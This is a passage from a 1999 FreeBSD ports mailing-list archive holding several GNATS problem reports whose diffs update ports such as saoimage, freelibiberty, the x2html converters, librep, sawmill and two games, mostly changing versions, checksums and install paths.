# It should not be necessary to edit anything below this line. - -! ARCH = sun - LINT = lint -b -! MKNOD = /etc/mknod - MV = mv -f - RANLIB = ranlib - RM = rm -f - SHELL = /bin/sh - -! CFLAGS = $(OFLAGS) $(ADFLAGS) $(MFLAGS) $(IFLAGS) -DFBCONFIG_2=\"$(IMTOOLRC)\" - - # SAOimage libraries that live in subdirectories with their own makefiles. - # This definition must be kept in correspondence with the DEPLIBS target. ---- 92,115 ---- - # usual link search path, i.e., it is not in /usr/lib, it may be necessary - # to specify its path fully in XLIB. - -! XLIB = -L$(X11BASE)/lib -lX11 -! #XLIB = -L/usr/X11R6/lib -lX11 # ATTENTION: OpenWindows users... - #F77LIB = -lF77 -lI77 -lU77 -+ F77LIB = -lf2c - #LDFLAGS = -Bstatic - - # END OF INSTALLATION DEPENDENT SETUP. ======================================== - # It should not be necessary to edit anything below this line. - -! ARCH = FreeBSD - LINT = lint -b -! MKNOD = /sbin/mknod - MV = mv -f - RANLIB = ranlib - RM = rm -f - SHELL = /bin/sh - -! CFLAGS += $(ADFLAGS) $(MFLAGS) $(IFLAGS) -DFBCONFIG_2=\"$(IMTOOLRC)\" - - # SAOimage libraries that live in subdirectories with their own makefiles. - # This definition must be kept in correspondence with the DEPLIBS target. -*************** -*** 306,312 **** - $(MAKE) ARCFILE=$(TAPEDEV) tar - - -! XLIBH = /usr/include/X11/Xlib.h /usr/include/X11/Xutil.h - STRUCT = hfiles/struct.h hfiles/buffer.h hfiles/color.h hfiles/control.h \ - hfiles/coord.h hfiles/cursor.h hfiles/image.h hfiles/window.h - WORKS = $(XLIBH) $(STRUCT) hfiles/constant.h hfiles/extern.h hfiles/wcs.h ---- 311,317 ---- - $(MAKE) ARCFILE=$(TAPEDEV) tar - - -! XLIBH = /usr/X11R6/include/X11/Xlib.h /usr/X11R6/include/X11/Xutil.h - STRUCT = hfiles/struct.h hfiles/buffer.h hfiles/color.h hfiles/control.h \ - hfiles/coord.h hfiles/cursor.h hfiles/image.h hfiles/window.h - WORKS = $(XLIBH) $(STRUCT) hfiles/constant.h hfiles/extern.h hfiles/wcs.h -*************** -*** 415,422 **** - defs/dispbox.def defs/magnibox.def defs/panbox.def \ - defs/btnbox.def defs/colorbox.def defs/graphbox.def \ - defs/desktop.def defs/cursor.def -! mainkey.o : $(WORKS) /usr/include/X11/keysym.h \ -! /usr/include/X11/keysymdef.h - mainslct.o : $(WORKS) - mainutil.o : $(XLIBH) $(STRUCT) hfiles/extern.h - menuctrl.o : $(WORKS) btnlib/buttons.h ---- 420,427 ---- - defs/dispbox.def defs/magnibox.def defs/panbox.def \ - defs/btnbox.def defs/colorbox.def defs/graphbox.def \ - defs/desktop.def defs/cursor.def -! mainkey.o : $(WORKS) /usr/X11R6/include/X11/keysym.h \ -! /usr/X11R6/include/X11/keysymdef.h - mainslct.o : $(WORKS) - mainutil.o : $(XLIBH) $(STRUCT) hfiles/extern.h - menuctrl.o : $(WORKS) btnlib/buttons.h +--- makefile.FreeBSD.orig Fri Nov 5 22:57:30 1999 ++++ makefile.FreeBSD Sun Dec 19 14:55:37 1999 +@@ -36,9 +36,9 @@ + # FBCONFIG_2, which is set to the value of IMTOOLRC in the definition of + # the CFLAGS macro below.) + +-SAOBINDIR = $(ROOT)/usr/local/bin/ +-SAOMANDIR = $(ROOT)/usr/local/man/manl/ +-IMTRCDIR = $(ROOT)/usr/local/lib/ ++SAOBINDIR = $(ROOT)$(PREFIX)/bin/ ++SAOMANDIR = $(ROOT)$(PREFIX)/man/manl/ ++IMTRCDIR = $(ROOT)$(PREFIX)/lib/ + + IMTOOLRC = $(IMTRCDIR)imtoolrc + FIFO_I = $(ROOT)/dev/imt1i diff -rNu saoimage.old/patches/patch-ac saoimage/patches/patch-ac --- saoimage.old/patches/patch-ac Fri Apr 17 23:27:32 1998 +++ saoimage/patches/patch-ac Sun Dec 19 15:45:20 1999 @@ -1,13 +1,11 @@ -*** makefile.orig Fri Feb 20 00:02:47 1998 ---- makefile Fri Feb 20 01:10:24 1998 -*************** -*** 108,113 **** ---- 108,115 ---- - apollo_m68k: - $(MAKE) apollo_68882 - -+ FreeBSD: # FreeBSD on Intel chip -+ $(MAKE) -f makefile.FreeBSD $(SAOIMAGE) ARCH=$@ - - hp: # Hewlett-Packard (HPUX) - $(MAKE) -f makefile.hp $(SAOIMAGE) ARCH=$@ +--- imhfile.c.old Sun Dec 19 15:00:35 1999 ++++ imhfile.c Sun Dec 19 15:42:50 1999 +@@ -1637,7 +1637,7 @@ + + /* Subtract minutes westward from UTC */ + ltm = localtime (&utc); +- lt = utc - timezone; ++ lt = ltm->tm_gmtoff; + + /* Correct for daylight savings time, if in effect */ + if (ltm->tm_isdst) diff -rNu saoimage.old/patches/patch-ad saoimage/patches/patch-ad --- saoimage.old/patches/patch-ad Fri Apr 17 23:27:32 1998 +++ saoimage/patches/patch-ad Thu Jan 1 01:00:00 1970 @@ -1,22 +0,0 @@ -*** ctrldisk.c.orig Fri Feb 20 00:37:18 1998 ---- ctrldisk.c Fri Feb 20 00:38:56 1998 -*************** -*** 157,164 **** - int nbytes; - char *filename; /* [i]: name of file being accessed */ - { - long lseek(); /* type not declared in */ -! - if( lseek(fd, (long)nbytes, L_SET) < 0 ) { - perror("lseek"); - (void)fprintf(stderr, "Can't lseek %d bytes", nbytes); ---- 157,165 ---- - int nbytes; - char *filename; /* [i]: name of file being accessed */ - { -+ #ifndef __FreeBSD__ - long lseek(); /* type not declared in */ -! #endif - if( lseek(fd, (long)nbytes, L_SET) < 0 ) { - perror("lseek"); - (void)fprintf(stderr, "Can't lseek %d bytes", nbytes); diff -rNu saoimage.old/patches/patch-ae saoimage/patches/patch-ae --- saoimage.old/patches/patch-ae Sun Jan 3 10:24:49 1999 +++ saoimage/patches/patch-ae Thu Jan 1 01:00:00 1970 @@ -1,11 +0,0 @@ ---- disppsct.c.orig Thu May 4 06:18:00 1995 -+++ disppsct.c Sun Jan 3 17:50:42 1999 -@@ -589,7 +589,7 @@ - char *getenv(); - #endif - --#ifdef SUN -+#if defined(SUN) && defined(sun) - long time(); /* should be in time.h, but not in SunOS */ - #endif - long clock; >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 19 7:10: 9 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 5588814E43 for ; Sun, 19 Dec 1999 07:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA53853; Sun, 19 Dec 1999 07:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from cichlids.com (as6-042.rp-plus.de [149.221.238.170]) by hub.freebsd.org (Postfix) with ESMTP id 03C4314CF2 for ; Sun, 19 Dec 1999 07:04:22 -0800 (PST) (envelope-from alex@cichlids.com) Received: from cichlids.cichlids.com (cichlids.cichlids.com [192.168.0.10]) by cichlids.com (Postfix) with ESMTP id C986FAB7F for ; Sun, 19 Dec 1999 16:05:30 +0100 (CET) Received: (from root@localhost) by cichlids.cichlids.com (8.9.3/8.9.3) id QAA06331; Sun, 19 Dec 1999 16:05:07 +0100 (CET) (envelope-from alex) Message-Id: <199912191505.QAA06331@cichlids.cichlids.com> Date: Sun, 19 Dec 1999 16:05:07 +0100 (CET) From: alex@big.endian.de To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15560: update devel/freelibiberty to 0.2 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15560 >Category: ports >Synopsis: update port to 0.2 >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Dec 19 07:10:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Alexander Langer >Release: FreeBSD 4.0-CURRENT i386 >Organization: nope >Environment: tested on -current >Description: update port to version 0.2: * change distname * do not install the port's getopt.h >How-To-Repeat: >Fix: diff -ru freelibiberty.old/Makefile freelibiberty/Makefile --- freelibiberty.old/Makefile Sun Dec 19 15:55:40 1999 +++ freelibiberty/Makefile Sun Dec 19 16:04:46 1999 @@ -1,5 +1,5 @@ # New ports collection makefile for: free-libiberty -# Version required: 0.1 +# Version required: 0.2 # Date created: 30 October 1999 # Whom: James Howard # @@ -20,7 +20,6 @@ ${INSTALL_DATA} ${WRKSRC}/libiberty.so.1 ${PREFIX}/lib ${LN} -sf ${PREFIX}/lib/libiberty.so.1 ${PREFIX}/lib/libiberty.so ${INSTALL_DATA} ${WRKSRC}/libiberty.h ${PREFIX}/include - ${INSTALL_DATA} ${WRKSRC}/getopt.h ${PREFIX}/include post-install: @${SETENV} OBJFORMAT=${PORTOBJFORMAT} ${LDCONFIG} -m ${PREFIX}/lib diff -ru freelibiberty.old/files/md5 freelibiberty/files/md5 --- freelibiberty.old/files/md5 Sun Dec 19 15:55:40 1999 +++ freelibiberty/files/md5 Sun Dec 19 15:59:28 1999 @@ -1 +1 @@ -MD5 (libiberty-0.1.tar.gz) = 757eb8df7c271ecf764ca45165645fef +MD5 (libiberty-0.2.tar.gz) = 0d6acad21ac04bb089e00aba2a868dee diff -ru freelibiberty.old/pkg/PLIST freelibiberty/pkg/PLIST --- freelibiberty.old/pkg/PLIST Sun Dec 19 15:55:40 1999 +++ freelibiberty/pkg/PLIST Sun Dec 19 16:00:42 1999 @@ -1,5 +1,4 @@ include/libiberty.h -include/getopt.h lib/libiberty.a lib/libiberty.so lib/libiberty.so.1 >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 19 7:10:18 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 9403E14FEA for ; Sun, 19 Dec 1999 07:10:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA53871; Sun, 19 Dec 1999 07:10:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from jerry.kfunigraz.ac.at (GIGAJERRY.kfunigraz.ac.at [143.50.55.161]) by hub.freebsd.org (Postfix) with ESMTP id B9E4714CF2 for ; Sun, 19 Dec 1999 07:08:47 -0800 (PST) (envelope-from mkamm@tom.kfunigraz.ac.at) Received: from tom.kfunigraz.ac.at (mc_tom [10.10.1.160]) by jerry.kfunigraz.ac.at (8.9.3/8.9.3) with ESMTP id QAA06605 for ; Sun, 19 Dec 1999 16:08:43 +0100 (MET) Received: from localhost.kfunigraz.ac.at (BONLINEB84.kfunigraz.ac.at [143.50.33.84]) by tom.kfunigraz.ac.at (8.9.3/8.9.3) with ESMTP id QAA20526 for ; Sat, 18 Dec 1999 16:19:43 +0100 (MET) Received: (from mkamm@localhost) by localhost.kfunigraz.ac.at (8.9.3/8.9.3) id MAA01305; Sat, 18 Dec 1999 12:20:00 +0100 (CET) (envelope-from mkamm) Message-Id: <199912181120.MAA01305@localhost.kfunigraz.ac.at> Date: Sat, 18 Dec 1999 12:20:00 +0100 (CET) From: mkamm@gmx.net Reply-To: mkamm@gmx.net To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15562: update of ports/textproc/X2html to version 0.7.2 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15562 >Category: ports >Synopsis: update of ports/textproc/X2html to version 0.7.2 >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Dec 19 07:10:03 PST 1999 >Closed-Date: >Last-Modified: >Originator: Martin Kammerhofer >Release: FreeBSD 3.4-RC i386 >Organization: Graz University >Environment: >Description: This brings /usr/ports/textproc/{c,java,perl}2html in sync with sunsite. (Yes, this is a update of three ports batched into one PR.) Only release number and MD5 are adjusted. The author's project page has been added to pkg/DESCR. Only c2html/pkg/DESCR has been tweaked a little more. >How-To-Repeat: >Fix: Index: c2html/Makefile =================================================================== RCS file: /home/dada/cvsroot/ports/c2html/Makefile,v retrieving revision 1.7 diff -u -t -r1.7 Makefile --- c2html/Makefile 1999/12/16 11:00:10 1.7 +++ c2html/Makefile 1999/12/16 11:16:33 @@ -6,7 +6,7 @@ # $FreeBSD: ports/textproc/c2html/Makefile,v 1.6 1999/09/28 01:20:27 dan Exp $ # -DISTNAME= c2html-0.6.3 +DISTNAME= c2html-0.7.2 CATEGORIES= textproc www MASTER_SITES= ${MASTER_SITE_SUNSITE} MASTER_SITE_SUBDIR= apps/www/converters Index: c2html/files/md5 =================================================================== RCS file: /home/dada/cvsroot/ports/c2html/files/md5,v retrieving revision 1.6 diff -u -t -r1.6 md5 --- c2html/files/md5 1999/12/16 11:00:10 1.6 +++ c2html/files/md5 1999/12/16 11:18:48 @@ -1 +1 @@ -MD5 (c2html-0.6.3.tar.gz) = 9bf08aa35af1f363f0cec5a6b6ed9e43 +MD5 (c2html-0.7.2.tar.gz) = f507f31d0a1172cb9e6b4b31e816ed9a Index: c2html/pkg/DESCR =================================================================== RCS file: /home/dada/cvsroot/ports/c2html/pkg/DESCR,v retrieving revision 1.2 diff -u -t -r1.2 DESCR --- c2html/pkg/DESCR 1999/03/21 18:05:36 1.2 +++ c2html/pkg/DESCR 1999/12/16 11:57:30 @@ -1,11 +1,14 @@ -c2html is a syntax highlighter for C source code that produces a -highlighted html file as output. The output can be read by any -graphical WWW-Browser. If the browser understands the tags to change -font colors (as Netscape does) the output will look like highlighted -by emacs. Otherwise it will not look so nice, but readability is -increased too. +C2html is a syntax highlighter for C source code that produces a +highlighted html file as output. -c2html can also work as a CGI program and convert your sources on the -fly. To use in this way copy it to your /cgi-bin directory and -configure your webserver to call c2html for *.c and *.h files. An -example that works with Apache is described in the manpage. +C2html offers the following features: + + - fast (single pass conversion using flex) + - doesn't change formatting - only adds tags + and properly escapes non-ascii characters + - easy integration with webservers - browse your sources colourized! + - gzips http output for browsers to save bandwidth (only in CGI mode) + - documentation and manpage included + +Please use the java2html port for converting C++ sources! +Homepage: http://user.cs.tu-berlin.de/~schintke/x2html/index.html Index: java2html/Makefile =================================================================== RCS file: /home/dada/cvsroot/ports/java2html/Makefile,v retrieving revision 1.5 diff -u -t -r1.5 Makefile --- java2html/Makefile 1999/12/16 11:00:10 1.5 +++ java2html/Makefile 1999/12/16 11:30:37 @@ -6,7 +6,7 @@ # $FreeBSD: ports/textproc/java2html/Makefile,v 1.5 1999/09/28 01:30:22 dan Exp $ # -DISTNAME= java2html-0.6.3 +DISTNAME= java2html-0.7.2 CATEGORIES= textproc www MASTER_SITES= ${MASTER_SITE_SUNSITE} MASTER_SITE_SUBDIR= apps/www/converters Index: java2html/files/md5 =================================================================== RCS file: /home/dada/cvsroot/ports/java2html/files/md5,v retrieving revision 1.4 diff -u -t -r1.4 md5 --- java2html/files/md5 1999/12/16 11:00:10 1.4 +++ java2html/files/md5 1999/12/16 11:30:56 @@ -1 +1 @@ -MD5 (java2html-0.6.3.tar.gz) = eda7fe66b21e079d61de769bc4fb5ee2 +MD5 (java2html-0.7.2.tar.gz) = a06c166312945a0bd17a1e97ffeb9a24 Index: java2html/pkg/DESCR =================================================================== RCS file: /home/dada/cvsroot/ports/java2html/pkg/DESCR,v retrieving revision 1.1.1.1 diff -u -t -r1.1.1.1 DESCR --- java2html/pkg/DESCR 1999/03/30 23:53:35 1.1.1.1 +++ java2html/pkg/DESCR 1999/12/16 11:49:24 @@ -10,3 +10,5 @@ - easy integration with webservers - browse your sources colourized - gzips http output for browsers to save bandwidth (only in CGI mode) - documentation and manpage included + +Homepage: http://user.cs.tu-berlin.de/~schintke/x2html/index.html Index: perl2html/Makefile =================================================================== RCS file: /home/dada/cvsroot/ports/perl2html/Makefile,v retrieving revision 1.1.1.2 diff -u -t -r1.1.1.2 Makefile --- perl2html/Makefile 1999/09/28 10:15:23 1.1.1.2 +++ perl2html/Makefile 1999/12/16 11:31:40 @@ -6,7 +6,7 @@ # $FreeBSD: ports/textproc/perl2html/Makefile,v 1.3 1999/09/28 01:30:21 dan Exp $ # -DISTNAME= perl2html-0.6.3 +DISTNAME= perl2html-0.7.2 CATEGORIES= textproc www MASTER_SITES= ${MASTER_SITE_SUNSITE} MASTER_SITE_SUBDIR= apps/www/converters Index: perl2html/files/md5 =================================================================== RCS file: /home/dada/cvsroot/ports/perl2html/files/md5,v retrieving revision 1.1.1.2 diff -u -t -r1.1.1.2 md5 --- perl2html/files/md5 1999/09/28 10:15:23 1.1.1.2 +++ perl2html/files/md5 1999/12/16 11:31:48 @@ -1 +1 @@ -MD5 (perl2html-0.6.3.tar.gz) = 7b8f7c8296c342d0462cc76fb34de0bb +MD5 (perl2html-0.7.2.tar.gz) = 0ca73bb3b5a138a45632eb756e016799 Index: perl2html/pkg/DESCR =================================================================== RCS file: /home/dada/cvsroot/ports/perl2html/pkg/DESCR,v retrieving revision 1.1.1.1 diff -u -t -r1.1.1.1 DESCR --- perl2html/pkg/DESCR 1999/05/27 20:38:28 1.1.1.1 +++ perl2html/pkg/DESCR 1999/12/16 11:48:20 @@ -9,3 +9,5 @@ - easy integration with webservers - browse your sources colourized - gzips http output for browsers to save bandwidth (only in CGI mode) - documentation and manpage included + +Homepage: http://user.cs.tu-berlin.de/~schintke/x2html/index.html >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 19 7:20: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 5589C14DDD for ; Sun, 19 Dec 1999 07:20:04 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA54581; Sun, 19 Dec 1999 07:20:04 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Sun, 19 Dec 1999 07:20:04 -0800 (PST) Message-Id: <199912191520.HAA54581@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: Alexander Langer Subject: Re: ports/15560: update devel/freelibiberty to 0.2 Reply-To: Alexander Langer Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15560; it has been noted by GNATS. From: Alexander Langer To: FreeBSD-gnats-submit@FreeBSD.ORG Cc: Subject: Re: ports/15560: update devel/freelibiberty to 0.2 Date: Sun, 19 Dec 1999 16:15:33 +0100 This PR is obsolete, because I happend to oversee PR #15263. I'm sorry. Please close. Doh! Alex :-( -- I doubt, therefore I might be. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 19 7:30: 9 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2652115051 for ; Sun, 19 Dec 1999 07:30:04 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA55422; Sun, 19 Dec 1999 07:30:04 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id D40AC15038; Sun, 19 Dec 1999 07:26:22 -0800 (PST) Message-Id: <19991219152622.D40AC15038@hub.freebsd.org> Date: Sun, 19 Dec 1999 07:26:22 -0800 (PST) From: rod@zort.on.ca To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15563: Updating the lang/librep port Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15563 >Category: ports >Synopsis: Updating the lang/librep port >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Dec 19 07:30:03 PST 1999 >Closed-Date: >Last-Modified: >Originator: Rod Taylor >Release: >Organization: Zort >Environment: >Description: librep (a dependency of sawmill) got updated. The other stuff sawmill requires will submitted soon aswell. >How-To-Repeat: >Fix: diff -ruN librep.old/Makefile librep/Makefile --- librep.old/Makefile Sun Dec 19 10:17:55 1999 +++ librep/Makefile Sun Dec 19 10:25:08 1999 @@ -6,9 +6,10 @@ # $FreeBSD: ports/lang/librep/Makefile,v 1.3 1999/12/02 06:47:47 nakai Exp $ # -DISTNAME= librep-0.8 +DISTNAME= librep-0.9 CATEGORIES= lang -MASTER_SITES= ftp://ftp.dcs.warwick.ac.uk/people/John.Harper/librep/ +MASTER_SITES= ftp://ftp.dcs.warwick.ac.uk/people/John.Harper/librep/ \ + http://www.oscentral.org/files/software/ MAINTAINER= nakai@FreeBSD.org diff -ruN librep.old/files/md5 librep/files/md5 --- librep.old/files/md5 Sun Dec 19 10:17:55 1999 +++ librep/files/md5 Sun Dec 19 10:18:29 1999 @@ -1 +1 @@ -MD5 (librep-0.8.tar.gz) = cbbbd98bfd7b26abd53b3df2f30670cd +MD5 (librep-0.9.tar.gz) = 58f88aec752bfb96f14e7cecc93d3bdc >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 19 7:30:13 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A4579150D5 for ; Sun, 19 Dec 1999 07:30:04 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA55431; Sun, 19 Dec 1999 07:30:04 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from cichlids.com (as6-042.rp-plus.de [149.221.238.170]) by hub.freebsd.org (Postfix) with ESMTP id 899D5150F9 for ; Sun, 19 Dec 1999 07:26:54 -0800 (PST) (envelope-from alex@cichlids.com) Received: from cichlids.cichlids.com (cichlids.cichlids.com [192.168.0.10]) by cichlids.com (Postfix) with ESMTP id 51CF7AB7F for ; Sun, 19 Dec 1999 16:28:03 +0100 (CET) Received: (from root@localhost) by cichlids.cichlids.com (8.9.3/8.9.3) id QAA16118; Sun, 19 Dec 1999 16:27:39 +0100 (CET) (envelope-from alex) Message-Id: <199912191527.QAA16118@cichlids.cichlids.com> Date: Sun, 19 Dec 1999 16:27:39 +0100 (CET) From: alex@big.endian.de To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15564: update games/blue to 2.4 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15564 >Category: ports >Synopsis: update port to 2.4 >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Dec 19 07:30:04 PST 1999 >Closed-Date: >Last-Modified: >Originator: Alexander Langer >Release: FreeBSD 4.0-CURRENT i386 >Organization: none >Environment: tested on -current >Description: * update to 2.4 * remove patch-directory (obselete) * port has own worksrc now >How-To-Repeat: >Fix: diff -ru blue.old/Makefile blue/Makefile --- blue.old/Makefile Sun Dec 19 16:20:56 1999 +++ blue/Makefile Sun Dec 19 16:22:55 1999 @@ -1,18 +1,17 @@ # New ports collection makefile for: blue -# Version required: 2.3 +# Version required: 2.4 # Date created: 6 June 1997 # Whom: Andrey Zakhvatov # # $FreeBSD: ports/games/blue/Makefile,v 1.2 1999/08/25 06:03:00 obrien Exp $ # -DISTNAME= blue-2.3 +DISTNAME= blue-2.4 CATEGORIES= games MASTER_SITES= ftp://locke.ccil.org/pub/esr/ MAINTAINER= andy@icc.surw.chel.su -NO_WRKSUBDIR= yes ALL_TARGET= MAN6= blue.6 diff -ru blue.old/files/md5 blue/files/md5 --- blue.old/files/md5 Sun Dec 19 16:20:56 1999 +++ blue/files/md5 Sun Dec 19 16:22:08 1999 @@ -1 +1 @@ -MD5 (blue-2.3.tar.gz) = 1e4c38cb0c36dc8c87eff2f8336267c2 +MD5 (blue-2.4.tar.gz) = 6182a2517e4f1f9f70836710aae6788d Only in blue.old: patches >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 19 8: 0: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 76A2214F94 for ; Sun, 19 Dec 1999 08:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA57683; Sun, 19 Dec 1999 08:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 35C5E14DF6; Sun, 19 Dec 1999 07:51:39 -0800 (PST) Message-Id: <19991219155139.35C5E14DF6@hub.freebsd.org> Date: Sun, 19 Dec 1999 07:51:39 -0800 (PST) From: rod@zort.on.ca To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15566: x11-wm/sawmill update Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15566 >Category: ports >Synopsis: x11-wm/sawmill update >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Dec 19 08:00:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Rod Taylor >Release: >Organization: Zort >Environment: >Description: Sawmill updated... (Sent in it's dependencies earlier) >How-To-Repeat: >Fix: diff -ruN sawmill.old/Makefile sawmill/Makefile --- sawmill.old/Makefile Sun Dec 19 10:15:14 1999 +++ sawmill/Makefile Sun Dec 19 10:48:24 1999 @@ -6,9 +6,10 @@ # $FreeBSD: ports/x11-wm/sawmill/Makefile,v 1.2 1999/12/02 06:48:47 nakai Exp $ # -DISTNAME= sawmill-0.17 +DISTNAME= sawmill-0.19 CATEGORIES= x11-wm -MASTER_SITES= ftp://ftp.dcs.warwick.ac.uk/people/John.Harper/sawmill/ +MASTER_SITES= ftp://ftp.dcs.warwick.ac.uk/people/John.Harper/sawmill/ \ + http://www.oscentral.org/files/software/ MAINTAINER= nakai@FreeBSD.org diff -ruN sawmill.old/files/md5 sawmill/files/md5 --- sawmill.old/files/md5 Sun Dec 19 10:15:14 1999 +++ sawmill/files/md5 Sun Dec 19 10:15:44 1999 @@ -1 +1 @@ -MD5 (sawmill-0.17.tar.gz) = 7c96c5e0f6a95b284e8226de05544b6b +MD5 (sawmill-0.19.tar.gz) = 41b011fb1ee1980f6b79c86d1acd9c82 >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 19 8: 0:12 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 13A7E150D5 for ; Sun, 19 Dec 1999 08:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA57692; Sun, 19 Dec 1999 08:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from cichlids.com (as6-042.rp-plus.de [149.221.238.170]) by hub.freebsd.org (Postfix) with ESMTP id 74F8414DF6 for ; Sun, 19 Dec 1999 07:56:15 -0800 (PST) (envelope-from alex@cichlids.com) Received: from cichlids.cichlids.com (cichlids.cichlids.com [192.168.0.10]) by cichlids.com (Postfix) with ESMTP id 774B9AB7F for ; Sun, 19 Dec 1999 16:57:19 +0100 (CET) Received: (from root@localhost) by cichlids.cichlids.com (8.9.3/8.9.3) id QAA17521; Sun, 19 Dec 1999 16:56:56 +0100 (CET) (envelope-from alex) Message-Id: <199912191556.QAA17521@cichlids.cichlids.com> Date: Sun, 19 Dec 1999 16:56:56 +0100 (CET) From: alex@big.endian.de To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15567: update games/bs to 2.2 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15567 >Category: ports >Synopsis: update games/bs to 2.2 (from 2.1) >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Dec 19 08:00:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Alexander Langer >Release: FreeBSD 4.0-CURRENT i386 >Organization: fubar >Environment: tested on current >Description: * update to 2.2 * shorten too long pkg/DESCR >How-To-Repeat: >Fix: diff -ru bs.old/Makefile bs/Makefile --- bs.old/Makefile Sun Dec 19 16:29:04 1999 +++ bs/Makefile Sun Dec 19 16:29:48 1999 @@ -1,12 +1,12 